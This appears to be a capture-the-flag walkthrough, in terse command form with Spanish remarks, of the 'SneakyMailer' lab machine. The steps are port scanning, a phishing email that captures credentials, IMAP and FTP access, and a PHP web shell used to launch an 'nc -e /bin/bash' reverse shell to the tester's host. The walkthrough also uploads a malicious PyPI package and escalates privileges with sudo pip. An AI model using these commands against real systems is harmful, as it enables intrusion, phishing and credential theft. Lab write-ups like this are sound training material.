nmap -A -p- -oA output 10.129.2.28 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA sneakymailer 10.129.2.28

nmap -sU -O -p- -oA sneakymailer-udp 10.129.2.28

nikto -h 10.129.2.28:80

Pasted image 20220131063810.png

Pasted image 20220131064325.png

echo "10.129.2.28 sneakycorp.htb dev.sneakycorp.htb pypi.sneakycorp.htb" | sudo tee -a /etc/hosts

Pasted image 20220131065748.png

curl -s -X GET "http://sneakycorp.htb/team.php" | html2text | grep "sneakymailer.htb" |awk 'NF{print $NF}' >users

Pasted image 20220131081458.png

cat users | tr '\n' ','

swaks --from "cu3rv0x@sneakycorp.htb" --to "tigernixon@sneakymailer.htb....." --header "Subject: README" --body "Da click http://10.10.14.120/test" --server 10.129.2.28

Pasted image 20220131082500.png

sudo python3 -m http.server 80

Pasted image 20220131082630.png

Vemos información de Paul en la petición recibida por el servidor HTTP

Pasted image 20220131082827.png

php --interactive

echo urldecode("1

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt")

Credenciales-> paulbyrd:^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

Pasted image 20220131175416.png

a1 OK LOGIN

a2 OK LIST completed

a3 EXAMINE "INBOX"

a4 EXAMINE "INBOX.Trash"

a5 EXAMINE "INBOX.Sent"

Pasted image 20220131180230.png

a6 EXAMINE "INBOX.Deleted Items"

a7 EXAMINE "INBOX.Sent Items"

Pasted image 20220131180617.png

a10 OK FETCH

Pasted image 20220131180841.png

a11 FETCH 2 body[]

Pasted image 20220131181011.png

cat credentials.txt

Pasted image 20220131181304.png

wfuzz -c --hh=185 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -H "Host: FUZZ.sneakycorp.htb" http://sneakycorp.htb

Pasted image 20220131182811.png

http://dev.sneakycorp.htb

Pasted image 20220131183814.png

ftp 10.129.2.28

paulbyrd:^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

pust cu3rv0x.php

Pasted image 20220206054134.png

Pasted image 20220131184103.png

http://dev.sneaky.corp.htb/cu3rvox.php?cmd=whoami

Pasted image 20220131184336.png

http://dev.sneaky.corp.htb/cu3rvox.php?cmd=nc -e /bin/bash 10.10.14.120 443

Pasted image 20220131184532.png

nc -lvnp 443

Pasted image 20220131184633.png

uname -a

lsb_release -a

find \-perm -4000 2>/dev/null

Pasted image 20220131185946.png

ls -al

cat .htpasswd

john --wordlist=/usr/share/wordlists/rockyou.txt hash

soufianeelhaoui

Pasted image 20220131190434.png

cat /etc/nginx/sites-available/pypi

Pasted image 20220131190535.png

ps -faux |grep "pypi"

Pasted image 20220131190704.png

http://pypi.sneakycorp.htb:8080

Pasted image 20220131191033.png

mkdir reverse

cd reverse

touch reverse/__init__.py

mkdir reverse

touch reverse/__init__.py

tree

Pasted image 20220131191655.png

Pasted image 20220201182035.png

cat setup.py

Pasted image 20220201183746.png

cat ~/.pypirc

Pasted image 20220201182226.png

python setup.py sdist upload -r reverse

sudo nc -lvnp 443

Pasted image 20220201183931.png

sudo -l

Pasted image 20220201185340.png

https://gtfobins.github.io/gtfobins/pip/

TF=$(mktemp -d) 
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF

Pasted image 20220201185820.png
